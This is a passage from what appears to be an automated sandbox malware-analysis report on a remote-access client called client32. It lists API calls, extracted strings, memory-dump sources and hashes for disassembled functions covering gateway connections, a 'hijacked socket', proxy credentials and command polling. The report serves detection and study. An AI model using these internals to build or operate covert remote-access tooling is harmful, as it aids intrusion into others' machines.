                                                                                                                  • _strpbrk.LIBCMT ref: 1106169B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                  • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                  • API String ID: 716802716-1571441106
                                                                                                                  • Opcode ID: 889064ab9b8cb21b4403e3511827bdee5e14e439b663983c64d8c18715834237
                                                                                                                  • Instruction ID: 7d354751decb521dd2b5a9477f267ff04dc70e6f2396a8d0e1f3593140cd268d
                                                                                                                  • Opcode Fuzzy Hash: 889064ab9b8cb21b4403e3511827bdee5e14e439b663983c64d8c18715834237
                                                                                                                  • Instruction Fuzzy Hash: D6A2C275E0465A9FEB10CF64CC40BEFB7B9AF44309F0481D9E949A7280EB71AA45CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,?,00000000,00000000), ref: 6BEBAA11
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA58
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA68
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAA94
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6BEBAB0B
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB4E
                                                                                                                  • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB5A
                                                                                                                  • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAB8E
                                                                                                                  • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBABB1
                                                                                                                  • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBABE3
                                                                                                                  • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC18
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC21
                                                                                                                  • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC29
                                                                                                                  • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC65
                                                                                                                  • WSASetBlockingHook.WSOCK32(6BEB63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC76
                                                                                                                  • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC8F
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC96
                                                                                                                  • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAC9C
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBACFD
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD04
                                                                                                                  • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD0A
                                                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD45
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6BEBAD4F
                                                                                                                  • InitializeCriticalSection.KERNEL32(-6BEFCB4A), ref: 6BEBADE6
                                                                                                                    • Part of subcall function 6BEB8FB0: _memset.LIBCMT ref: 6BEB8FE4
                                                                                                                    • Part of subcall function 6BEB8FB0: getsockname.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB9005
                                                                                                                  • getsockname.WSOCK32(00000000,?,?), ref: 6BEBAE4B
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898), ref: 6BEBAE60
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEBAE6C
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBAE7A
                                                                                                                  Strings
                                                                                                                  • Connect error to %s using hijacked socket, error %d, xrefs: 6BEBAB17
                                                                                                                  • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6BEBAD14
                                                                                                                  • Cannot connect to gateway %s, error %d, xrefs: 6BEBACA6
                                                                                                                  • *TcpNoDelay, xrefs: 6BEBABB8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                  • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                  • API String ID: 692187944-2561115898
                                                                                                                  • Opcode ID: 52e4dadcc28fc42ccd8705328bcc1347bd217c77094907ed8254e96bd5a311b4
                                                                                                                  • Instruction ID: 1a3f2d5908de9476f57d471e74c2d30b1398e5429e8c329f9a25854c2a0dc98f
                                                                                                                  • Opcode Fuzzy Hash: 52e4dadcc28fc42ccd8705328bcc1347bd217c77094907ed8254e96bd5a311b4
                                                                                                                  • Instruction Fuzzy Hash: 68E1B575A402189FDF10DFA4DD81B9DB3B5EF88305F2041AEE90A97380DB789D95CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • #16.WSOCK32(00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB924C
                                                                                                                  • WSAGetLastError.WSOCK32(00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB925B
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB9274
                                                                                                                  • Sleep.KERNEL32(00000001,00000000,?,a3k,00000000,00000000,?,00000007), ref: 6BEB92A8
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEB92B0
                                                                                                                  • Sleep.KERNEL32(00000014), ref: 6BEB92BC
                                                                                                                  Strings
                                                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6BEB9226
                                                                                                                  • ReadSocket - Connection has been closed by peer, xrefs: 6BEB92E0
                                                                                                                  • a3k, xrefs: 6BEB9244
                                                                                                                  • ReadSocket - Would block, xrefs: 6BEB928A
                                                                                                                  • *RecvTimeout, xrefs: 6BEB927B
                                                                                                                  • ReadSocket - Error %d reading response, xrefs: 6BEB92F7
                                                                                                                  • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6BEB922B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountSleepTick$ErrorLast
                                                                                                                  • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3k$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                  • API String ID: 2495545493-3875726919
                                                                                                                  • Opcode ID: e8a5a9fcd373c5ccd2f26a40a74ff2d5a5f5bd07018f8b6f7451a62d74c491d3
                                                                                                                  • Instruction ID: ddd2a4ae8d054d26e674def8952b18933656cfb2983143f234349092b5df8d31
                                                                                                                  • Opcode Fuzzy Hash: e8a5a9fcd373c5ccd2f26a40a74ff2d5a5f5bd07018f8b6f7451a62d74c491d3
                                                                                                                  • Instruction Fuzzy Hash: 70312779E00208AFEB10DFF8EA85B8E73F8EF55315F204469F909D7241D73999118791
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,9410354D,4CBAF0D2,941034B3,FFFFFFFF,00000000), ref: 6BEC31E2
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6BEEECB0), ref: 6BEC31EC
                                                                                                                  • GetSystemTime.KERNEL32(?,4CBAF0D2,941034B3,FFFFFFFF,00000000), ref: 6BEC322A
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6BEEECB0), ref: 6BEC3234
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,?,9410354D), ref: 6BEC32BE
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6BEC32D3
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6BEC334D
                                                                                                                    • Part of subcall function 6BECBA20: __strdup.LIBCMT ref: 6BECBA3A
                                                                                                                    • Part of subcall function 6BECBB00: _free.LIBCMT ref: 6BECBB2D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                  • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                  • API String ID: 1510130979-3441452530
                                                                                                                  • Opcode ID: 7a8ee056370b8da5b7a45ca4697db19b28c3b0562e9e96feca3bbb744a539853
                                                                                                                  • Instruction ID: b5e2fe7f568e7f7599dc4a0e12490221a7cbba93a8cc1bf48fa654e9dfbfb671
                                                                                                                  • Opcode Fuzzy Hash: 7a8ee056370b8da5b7a45ca4697db19b28c3b0562e9e96feca3bbb744a539853
                                                                                                                  • Instruction Fuzzy Hash: B5612F72D00208AFCB14DFB4D995EEEB7B9FF49314F24451DE526A7241EB38A504CBA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _malloc_memsetwsprintf
                                                                                                                  • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$11/09/15 09:21:05 V12.10F2$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                  • API String ID: 3802068140-1759247563
                                                                                                                  • Opcode ID: a8c1789ade1027bfc11a95fffc2dd2e3d9204dc5bbfbfc96940aeedc525a177a
                                                                                                                  • Instruction ID: d240301f554d32d3b7904e5f3cd70c9da08142028b12ad4ce6a05654279abd09
                                                                                                                  • Opcode Fuzzy Hash: a8c1789ade1027bfc11a95fffc2dd2e3d9204dc5bbfbfc96940aeedc525a177a
                                                                                                                  • Instruction Fuzzy Hash: B132D675D0026A9FDB12DF94CC84BEDF7B9AB44308F8445E9E958A7280EB706E44CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset
                                                                                                                  • String ID: *Dept$*Gsk$1.1$494126$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                  • API String ID: 2102423945-1017439714
                                                                                                                  • Opcode ID: 0b133566f8baf5b84f14fb9d21d8f573223191e29a49831b03a67a36d44188f0
                                                                                                                  • Instruction ID: ae0538dbceaa9ff161e28677e08bb2b25797dc1bc535e7c2a78fbd1eef3d188f
                                                                                                                  • Opcode Fuzzy Hash: 0b133566f8baf5b84f14fb9d21d8f573223191e29a49831b03a67a36d44188f0
                                                                                                                  • Instruction Fuzzy Hash: D8E1B2B2C0022C6ACB21DBB0DD91EEFB77C9F59305F2045C9E51962141DB79AB858FB2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB63E8
                                                                                                                  • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6BEB63FA
                                                                                                                  • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6412
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB643B
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6450
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB646F
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6484
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6BEB64A3
                                                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64C5
                                                                                                                  • shutdown.WSOCK32(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64E9
                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB64F2
                                                                                                                  • timeGetTime.WINMM(?,00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6510
                                                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6526
                                                                                                                  • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6533
                                                                                                                  • timeGetTime.WINMM(?,00000000,?,6BEBD77B,00000000), ref: 6BEB6540
                                                                                                                  • Sleep.KERNEL32(00000001,?,00000000,?,6BEBD77B,00000000), ref: 6BEB654B
                                                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6563
                                                                                                                  • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB6574
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB657D
                                                                                                                  • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB658E
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6BEBD77B,00000000), ref: 6BEB659E
                                                                                                                  • _memset.LIBCMT ref: 6BEB65C8
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,6BEBD77B,00000000), ref: 6BEB65D7
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,?,00000000,?,6BEBD77B,00000000), ref: 6BEB65F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                  • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                  • API String ID: 3764039262-2631155478
                                                                                                                  • Opcode ID: a5eac8150d051d71b98cdad275865d70eb9b202bc7a5642a6bd86c2e7b1f4933
                                                                                                                  • Instruction ID: 6fee7502d1e7052f2f6bdd6ec50c4a7f38af690b6ad0750645df1517bd54db0e
                                                                                                                  • Opcode Fuzzy Hash: a5eac8150d051d71b98cdad275865d70eb9b202bc7a5642a6bd86c2e7b1f4933
                                                                                                                  • Instruction Fuzzy Hash: 93519171A407009FDB10DFA8DD85F56B3BDBF89318F200958E50AD7281EBB8E995CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _strncmp
                                                                                                                  • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                  • API String ID: 909875538-2848211065
                                                                                                                  • Opcode ID: f759bee8d0be814c10bd4b82937134861f8a45e76a22ae2b4a9e4587a5e6b970
                                                                                                                  • Instruction ID: 255dddd7419939c8f6f7f14ea74b68e100bade5c4eb3454d40cbe1863319f058
                                                                                                                  • Opcode Fuzzy Hash: f759bee8d0be814c10bd4b82937134861f8a45e76a22ae2b4a9e4587a5e6b970
                                                                                                                  • Instruction Fuzzy Hash: 6CD10575A042199FDB20CF64DD81BD9B7B8AF6A308F2041D9D80D9B342D739D985CF92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6BD5
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6C26
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 6BEC6C5B
                                                                                                                    • Part of subcall function 6BEC6940: GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                  • WaitForSingleObject.KERNEL32(0000030C,?), ref: 6BEC6C7C
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6C93
                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6BEC6CB4
                                                                                                                  • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6BEC6CD9
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6CEC
                                                                                                                  • _calloc.LIBCMT ref: 6BEC6D76
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6DF3
                                                                                                                  • InterlockedExchange.KERNEL32(02B034BA,00000000), ref: 6BEC6E01
                                                                                                                  • _calloc.LIBCMT ref: 6BEC6E33
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6E47
                                                                                                                  • InterlockedDecrement.KERNEL32(02B03462), ref: 6BEC6EC3
                                                                                                                  • SetEvent.KERNEL32(00000314), ref: 6BEC6ECF
                                                                                                                  • _memmove.LIBCMT ref: 6BEC6EF4
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6F4F
                                                                                                                  • InterlockedExchange.KERNEL32(02B03402,-6BEFA188), ref: 6BEC6F60
                                                                                                                  Strings
                                                                                                                  • httprecv, xrefs: 6BEC6BDD
                                                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6BEC6E62
                                                                                                                  • ReadMessage returned FALSE. Terminating connection, xrefs: 6BEC6F3A
                                                                                                                  • ProcessMessage returned FALSE. Terminating connection, xrefs: 6BEC6F25
                                                                                                                  • ResumeTimeout, xrefs: 6BEC6BBA
                                                                                                                  • FALSE, xrefs: 6BEC6E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                  • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                  • API String ID: 1449423504-919941520
                                                                                                                  • Opcode ID: 8cc41213762e4cdac4044ba130ffaafacd63c2c8abe2c8fd127e1ad85ae8d717
                                                                                                                  • Instruction ID: d8eac146312834122623b7059c7cb86c7c8b3ca68978ae7a0b0a385cbdabf870
                                                                                                                  • Opcode Fuzzy Hash: 8cc41213762e4cdac4044ba130ffaafacd63c2c8abe2c8fd127e1ad85ae8d717
                                                                                                                  • Instruction Fuzzy Hash: 11B1C4B1D002549FDB20CF24DE45BEB73B8EB89348F2041D9E559A7240D7B89AC4CF92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<k
                                                                                                                  • API String ID: 2111968516-1135366504
                                                                                                                  • Opcode ID: 2f07eac22c60bb859a42d2600604bbfddd79f4d962b9aa65635012b5c69ad956
                                                                                                                  • Instruction ID: 4fd457ec5ffff23f944164af4eb7afa265458fee13d36d8971221fde75f71be0
                                                                                                                  • Opcode Fuzzy Hash: 2f07eac22c60bb859a42d2600604bbfddd79f4d962b9aa65635012b5c69ad956
                                                                                                                  • Instruction Fuzzy Hash: 862281B2E00258ABDB21CF64CD80EEAB3BDAB4A304F1485D9E55D67640DB395F84CF52
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 111031EE
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB5C4), ref: 111031F7
                                                                                                                  • GetTickCount.KERNEL32 ref: 111031FD
                                                                                                                  • GetTickCount.KERNEL32 ref: 11103250
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103259
                                                                                                                  • GetTickCount.KERNEL32 ref: 1110328A
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4), ref: 11103293
                                                                                                                  • EnterCriticalSection.KERNEL32(111EB5C4), ref: 111032BC
                                                                                                                  • LeaveCriticalSection.KERNEL32(111EB5C4,00000000,?,00000000), ref: 11103383
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                    • Part of subcall function 110EE9B0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103327,?), ref: 110EE9DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                                                  • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                  • API String ID: 1574099134-3013461081
                                                                                                                  • Opcode ID: b039da78e7f60a0956db5c69d50db6548e5713577cffa5e4926f0cc6d21667ef
